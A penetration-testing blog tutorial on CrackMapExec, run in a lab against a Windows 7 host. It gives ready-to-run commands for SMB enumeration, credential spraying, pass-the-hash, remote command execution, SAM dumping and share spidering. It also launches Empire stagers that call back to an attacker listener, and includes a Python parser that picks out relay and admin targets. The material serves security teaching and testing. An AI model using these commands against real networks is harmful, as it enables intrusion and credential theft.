Bow Before the All Powerful CrackMapExec!!

There are many other blogs covering CrackMapExec, as well as the official GitHub documentation, so why am I writing this article? Much like all of our other blogs on BestestRedTeam, it is mostly to help those who want to learn from our blog, and a learning opportunity for the authors to discover new technologies and techniques. Hope you enjoy!

CrackMapExec, more commonly referred to as CME, is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. CME was written by the well-known byt3bl33d3r. Built with stealth in mind, CME follows the concept of "Living off the Land" (LotL). Attackers who use LotL tactics carry out their work with trusted, preinstalled system tools and the built-in protocols those tools speak rather than dropping custom malware; a large number of stock Windows binaries can be abused this way. They do this mainly to hide their activity, hoping it will be lost in a sea of legitimate processes and routine administrative traffic. In the same spirit, CME abuses built-in Active Directory features and protocols (SMB, WMI, WinRM and so on) to take over hosts and dig through sensitive information, while evading much off-the-shelf AV/IDS/IPS. Keep in mind what that does and does not hide: nothing custom lands on disk, but every authentication attempt and every remote execution CME performs still shows up in the target's Security and System event logs and on the wire, so it is stealthy against signature-based endpoint products, not against someone watching logon and service-creation events.

byt3bl33d3r notes on the GitHub page that CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.

The installation instructions on the GitHub page say that CME can be installed from the apt repository, but I have found that "stable" in this case means out of date, so I recommend installing from the GitHub source. Additionally, the GitHub instructions recommend installing within a Python virtual environment or pipenv; since I tear down my Kali images so often I chose not to do that. If pipenv is required, read the installation instructions on the GitHub page.

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential
#~ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
#~ cd CrackMapExec
#~ python setup.py install

Now that CME is installed you can use the tool to enumerate live Windows hosts on the network. Note that CME is primarily a post-exploitation tool: it assumes you already hold a set of credentials, which you will need to obtain by other means first. For demonstration purposes I will be using a Windows 7 x64 Home edition machine with Symantec Endpoint Protection installed (hence the name SEPTest). However, for peace of mind and continuity I have disabled SEP for this blog post. Evading AV can, and hopefully will, be an entirely different blog post. Keep in mind that on Windows 7 Home edition the built-in Administrator account is disabled by default and will have to be enabled in order to perform these tests. Final note: this blog post took some time to write, and IP addresses changed between screenshots.

For this blog post I ran Responder on my Kali machine and caught some broadcast traffic from the Windows 7 box, which yielded a hash with a very easily cracked password. From there I will demonstrate what CME can do. I will be focusing on the SMB protocol, but CME also offers others such as winrm, http, etc.

Find live hosts:
#~ cme smb 192.168.1.0/24

Or write out the hosts that do not require SMB signing (these are the targets you can use for NTLM relay with Impacket's ntlmrelayx):
#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

Once you have a list of live hosts, the following check attempts authentication to the entire /24, though a single target may also be used. Spraying the full /24 shows where else this username and password has access, which is how one compromised workstation turns into several.

#~ cme smb 192.168.1.0/24 -u username -p 'password'

CME also allows you to perform pass-the-hash (PtH) attacks. Keep in mind that this requires the NT hash, the value you get from a SAM or NTDS.dit dump, supplied to -H as LM:NT (the aad3b435... half below is the hash of an empty LM password, which is what modern Windows stores). A Net-NTLMv2 challenge/response captured with Responder cannot be passed: it is an HMAC over a challenge the server chose for that one connection, so your only options with it are cracking it offline or relaying it with ntlmrelayx while the connection is still open.

#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

As you can see in the screenshots above, failed logins are marked [-], whereas successful logins are marked [+] Domain\Username:Password.

Local admin access results in (Pwn3d!) being appended to the login confirmation, as shown below. Remember that you need local admin rights on the target to use the remote-execution methods (WMI, SMB service creation, scheduled tasks) and to dump credentials; a [+] without (Pwn3d!) still confirms the credential is valid on that host. One caveat for non-domain accounts: with UAC remote restrictions in place, only the built-in Administrator (RID 500) gets a full token over the network, so other local admins will authenticate but not show (Pwn3d!) unless LocalAccountTokenFilterPolicy is set to 1 on the target. That is why the disabled built-in Administrator account had to be enabled on the Windows 7 Home box.
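As an added example (not part of the original post and not CrackMapExec's own code), here is a small Python parser for the console output format shown in this section. It folds the [*] fingerprint line and the [+]/[-] credential-check line for each host into one record, then pulls out the two lists you act on next: hosts that do not require SMB signing (what --gen-relay-list writes, for ntlmrelayx) and hosts flagged (Pwn3d!) (where -x, --sam and the modules will work). The sample output is constructed to match the WIN7BOX layout; the DC01 and FILE01 lines are made up for the example.

```python
import re

# Constructed sample output in the column layout of the WIN7BOX run above
# (not captured from a real engagement). The [*] line carries the host
# fingerprint, the [+]/[-] line the result of the credential check.
SAMPLE_OUTPUT = r"""
SMB         192.168.10.11    445    WIN7BOX         [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB         192.168.10.11    445    WIN7BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB         192.168.10.12    445    DC01            [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:LAB) (signing:True) (SMBv1:False)
SMB         192.168.10.12    445    DC01            [-] LAB\Administrator:P@ssw0rd STATUS_LOGON_FAILURE
SMB         192.168.10.13    445    FILE01          [*] Windows 10.0 Build 17763 x64 (name:FILE01) (domain:LAB) (signing:False) (SMBv1:False)
SMB         192.168.10.13    445    FILE01          [+] LAB\Administrator:P@ssw0rd
"""

# PROTO  IP  PORT  HOSTNAME  [marker] message
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<mark>[*+\-!])\]\s+(?P<msg>.*)$"
)
# (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True) ...
FLAG_RE = re.compile(r"\((\w+):([^)]*)\)")


def parse_cme_smb(text):
    """Fold CME output lines into one record per IP."""
    hosts = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # banners, module output, blank lines
        rec = hosts.setdefault(m["ip"], {
            "hostname": m["host"], "flags": {}, "login": None, "admin": False, "failure": None,
        })
        if m["mark"] == "*":
            rec["flags"].update(FLAG_RE.findall(m["msg"]))
        elif m["mark"] == "+":
            rec["login"] = m["msg"].replace("(Pwn3d!)", "").strip()
            rec["admin"] = "(Pwn3d!)" in m["msg"]
        elif m["mark"] == "-":
            rec["failure"] = m["msg"]
    return hosts


def relay_targets(hosts):
    """Hosts that do not require SMB signing: the same set --gen-relay-list writes out."""
    return sorted(ip for ip, r in hosts.items() if r["flags"].get("signing") == "False")


def valid_hosts(hosts):
    """Hosts where the credential authenticated ([+])."""
    return sorted(ip for ip, r in hosts.items() if r["login"])


def admin_hosts(hosts):
    """Hosts where the credential is local admin ([+] ... (Pwn3d!)): -x/-X, --sam and modules work here."""
    return sorted(ip for ip, r in hosts.items() if r["admin"])


if __name__ == "__main__":
    hosts = parse_cme_smb(SAMPLE_OUTPUT)
    print("relay targets :", relay_targets(hosts))
    print("valid creds   :", valid_hosts(hosts))
    print("local admin   :", admin_hosts(hosts))
```

In practice you would feed it `cme smb ... | tee run.log` output rather than the constructed string; the point is that the [*] line and the [+]/[-] line for a host are two separate records that you have to join on IP before deciding what to do with the host.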

CME also allows command execution with valid admin credentials. For example, in the screenshot below I use the valid credentials to execute whoami and ipconfig.

#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
SMB         192.168.10.11    445    WIN7BOX         [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7BOX) (domain:LAB) (signing:False) (SMBv1:True)
SMB         192.168.10.11    445    WIN7BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
SMB         192.168.10.11    445    WIN7BOX         [+] Executed command 
SMB         192.168.10.11    445    WIN7BOX         lab\administrator

Or, if you would prefer to execute PowerShell commands directly, use the uppercase -X.

#~ crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

CME is also helpful for digging through shares or drives once you have a foothold on the network. For example, cme smb x.x.x.x -u 'user' -p 'pass' --spider 'C$' --pattern <pattern> searches the share for file names matching the pattern (spidering C$ needs admin rights, since it is an administrative share). In the screenshot below I created a text file called password.txt hidden on the C drive and CME did not take long at all to discover it. You can also use the --content flag to search inside files for the pattern; note that this adds considerable time and traffic, since every candidate file has to be read over SMB.

You can even use CME to dump the local SAM database with the --sam option. This needs admin rights (hence (Pwn3d!)), and the NT hashes it returns are exactly what -H accepts for pass-the-hash against the next host.

There are many different options built into CME, but if all of the above is not enough to convince you to add it to your toolbelt, the modules packaged with CME will. The available modules can be listed with the -L flag after the protocol.

#~ cme smb -L
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] get_keystrokes            Logs keys pressed, time and the active window
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it

-- SNIP --

Then the module can be executed with the following syntax:

cme <protocol> <target(s)> -M <module name>

Not sure what options a module needs? Add --options to the module command.

cme smb -M mimikatz --options

Even better, let's make it rain shells! The following module uses CME to launch a PowerShell Empire stager. I will not be covering the setup of PowerShell Empire, but will focus on how to start Empire so that it catches the stagers CME launches.

A couple of notes about the staging below: use a port that will not conflict with anything else. Next, set the Host option after the Port, otherwise Empire will not update the port in the Host URL. Finally, make sure that CertPath points to a folder containing both the certificate and the private key needed for HTTPS; it is not well documented, but it needs the folder, not the files.

(Empire: listeners) > set Name test
(Empire: listeners) > set Port 9090
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set CertPath data/
(Empire: listeners) > execute
(Empire: listeners) >
#~ python empire --rest --user empireadmin --pass 'Password123!'

[*] Loading modules from: /root/Downloads/Empire/lib/modules/
 * Starting Empire RESTful API on port: 1337
 * RESTful API token: <long string>
 * Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)

If you want to set your own username and password for the Empire REST API (these are what CME uses to request the stager), change the settings in CME's config at ~/.cme/cme.conf:

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123

Now the final step is to run the empire_exec module inside CME.  

#~ crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=<listener name>

What happened next will shock you... Nothing. For some reason I cannot for the life of me get the Empire stager to call back to my machine. I have attempted to manually run the PowerShell command for the callback with no success. I have turned off all AV and made sure the firewall wasn't blocking traffic. I will need to continue investigating this issue, but I do not want to hold this blog up any further, so I hope this helps when performing an internal penetration test in the future. Until next time, keep on hacking!